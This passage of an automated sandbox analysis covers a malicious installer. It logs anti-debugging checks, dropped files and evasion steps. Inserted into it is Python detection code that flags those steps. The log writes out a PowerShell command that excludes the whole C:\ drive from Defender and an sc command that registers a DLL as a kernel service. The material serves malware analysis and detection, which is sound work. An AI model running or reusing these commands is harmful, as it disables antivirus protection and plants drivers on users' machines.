Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Window / User API: threadDelayed 604
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Window / User API: threadDelayed 567
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Window / User API: threadDelayed 577
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-R46SO.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V2E3L.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-R46SO.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-0F5J3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V2E3L.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe API coverage: 7.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6428 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS (2 occurrences)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (32 occurrences)
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA1AEC0 FindFirstFileA,FindClose, 6_2_6CA1AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 10_2_00AF6868
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 10_2_00AF7496
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF9C60 GetSystemInfo, 10_2_00AF9C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000002.2107441291.0000000001287000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000002.2107441291.0000000001287000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8A3886 NtSetInformationThread 00000000,00000011,00000000,00000000 6_2_6C8A3886
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Thread information set: HideFromDebugger (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA30181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6CA30181
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B757D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_00B757D0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA39D35 mov eax, dword ptr fs:[00000030h] 6_2_6CA39D35
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA39D66 mov eax, dword ptr fs:[00000030h] 6_2_6CA39D66
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA2F17D mov eax, dword ptr fs:[00000030h] 6_2_6CA2F17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA28CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6CA28CBD
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA30181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6CA30181

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" (2 occurrences)
Source: tProtect.dll.12.dr Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar (31 occurrences)
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
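The process-creation lines above record three things a detection engineer would want to alert on: a PowerShell Add-MpPreference exclusion for the whole C:\ drive, an sc create of a type= kernel service whose image is a .dll under Program Files (x86) rather than a .sys under System32\drivers, and a long run of sc start retries for that service. The following Python is an added example (not part of this report and not the sample's code) that scores constructed process-creation events for those three patterns. It also decodes a -EncodedCommand payload before matching, since the report's Sigma hit refers to a base64-encoded MpPreference cmdlet. The event shape (parent, image, cmdline), the rule names, the severity thresholds, the list of "broad" exclusion roots and the benign control events are assumptions made for the example; the malicious command lines are the ones recorded above.

```python
# Added example: hunting rules for the Defender-exclusion and kernel-driver-service
# behaviour in this report, run over constructed process-creation events
# (assumed event shape: parent, image, cmdline). Not real telemetry.
import base64
import re
from collections import Counter
from dataclasses import dataclass


@dataclass
class Finding:
    rule: str
    severity: str
    detail: str


# Exclusion roots broad enough to blind Defender for most of the disk (assumed list).
BROAD_EXCLUSION_ROOTS = {"c:", "c:\\users", "c:\\windows", "c:\\programdata",
                         "c:\\program files", "c:\\program files (x86)"}
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
MP_EXCLUSION = re.compile(
    r"""(?:Add|Set)-MpPreference\b.*?-Exclusion(Path|Process|Extension)\s+['"]?([^'"\s]+)""", re.I)
SC_CREATE = re.compile(r'^\s*"?sc(?:\.exe)?"?\s+create\s+(\S+)\s*(.*)$', re.I)
SC_START = re.compile(r'^\s*"?sc(?:\.exe)?"?\s+start\s+(\S+)', re.I)
SC_KV = re.compile(r'(\w+)=\s*(?:"([^"]*)"|(\S+))')  # sc.exe's "key= value" syntax


def decode_encoded_command(cmdline):
    """Return the UTF-16LE payload of -EncodedCommand when present, else the line itself."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def check_defender_exclusion(ev):
    """Add-/Set-MpPreference exclusions; a drive root or system directory is high severity."""
    if not ev["image"].lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return []
    m = MP_EXCLUSION.search(decode_encoded_command(ev["cmdline"]))
    if not m:
        return []
    kind, value = m.group(1), m.group(2)
    broad = kind.lower() == "path" and value.lower().rstrip("\\") in BROAD_EXCLUSION_ROOTS
    return [Finding("defender_exclusion_added", "high" if broad else "medium",
                    f"Exclusion{kind}={value} from parent {ev['parent']}")]


def parse_sc_create(cmdline):
    """Return (service name, {option: value}) for an 'sc create' line, else None."""
    m = SC_CREATE.match(cmdline)
    if not m:
        return None
    return m.group(1), {k.lower(): (q or u) for k, q, u in SC_KV.findall(m.group(2))}


def check_kernel_service(ev):
    """'sc create ... type= kernel' whose image is not a .sys file under System32\\drivers."""
    parsed = parse_sc_create(ev["cmdline"])
    if not parsed:
        return []
    name, opts = parsed
    if opts.get("type", "").lower() not in ("kernel", "filesys"):
        return []
    binpath = opts.get("binpath", "")
    reasons = []
    if not binpath.lower().endswith(".sys"):
        reasons.append("image is not a .sys file")
    if "\\windows\\system32\\drivers\\" not in binpath.lower():
        reasons.append("image outside System32\\drivers")
    if not reasons:
        return []
    return [Finding("kernel_service_from_unusual_path", "high" if len(reasons) == 2 else "medium",
                    f"{name}: binPath={binpath} ({'; '.join(reasons)})")]


def check_start_burst(events, threshold=5):
    """Repeated 'sc start <name>' is the retry loop a driver that fails to load produces."""
    counts = Counter()
    for ev in events:
        m = SC_START.match(ev["cmdline"])
        if m:
            counts[m.group(1).lower()] += 1
    return [Finding("service_start_burst", "medium", f"{name}: {n} start attempts")
            for name, n in counts.items() if n >= threshold]


def analyze(events):
    findings = []
    for ev in events:
        findings += check_defender_exclusion(ev) + check_kernel_service(ev)
    return findings + check_start_burst(events)


# Constructed events: the malicious command lines are the ones this report records;
# the benign controls (Get-MpPreference, gooddrv, AppSvc, Spooler) are made up.
INSTALLER = r"C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SC = r"C:\Windows\System32\sc.exe"
ENCODED = base64.b64encode(
    "Add-MpPreference -ExclusionPath 'C:\\Users\\user\\AppData'".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"parent": INSTALLER, "image": PS,
     "cmdline": "\"powershell.exe\" -Command \"Add-MpPreference -ExclusionPath 'C:\\'\""},
    {"parent": INSTALLER, "image": PS, "cmdline": f"powershell.exe -NoProfile -EncodedCommand {ENCODED}"},
    {"parent": r"C:\Windows\explorer.exe", "image": PS, "cmdline": "powershell.exe -Command Get-MpPreference"},
    {"parent": CMD, "image": SC, "cmdline": 'sc create CleverSoar displayname= CleverSoar binPath= '
     '"C:\\Program Files (x86)\\Windows NT\\tProtect.dll" type= kernel start= auto'},
    {"parent": CMD, "image": SC,
     "cmdline": 'sc create gooddrv binPath= "C:\\Windows\\System32\\drivers\\gooddrv.sys" type= kernel start= demand'},
    {"parent": CMD, "image": SC, "cmdline": 'sc create AppSvc binPath= "C:\\Program Files\\App\\svc.exe" type= own start= auto'},
    *[{"parent": CMD, "image": SC, "cmdline": "sc start CleverSoar"} for _ in range(6)],
    {"parent": CMD, "image": SC, "cmdline": "sc start Spooler"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.detail}")
```

Run against the sample events it yields four findings: the C:\ exclusion (high), the encoded AppData exclusion (medium), the CleverSoar kernel service pointing at a .dll outside System32\drivers (high), and the six-start burst (medium); the benign control events produce nothing. The parent-process field is carried into the detail because an Inno Setup temporary (is-*.tmp) spawning powershell.exe to touch MpPreference is the part of this chain that does not occur in legitimate installs.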
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF7720 cpuid 6_2_6CAF7720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AFAB2A GetSystemTimeAsFileTime, 10_2_00AFAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B90090 GetVersion, 10_2_00B90090
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2268261288.00000000015B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe
No contacted IP infos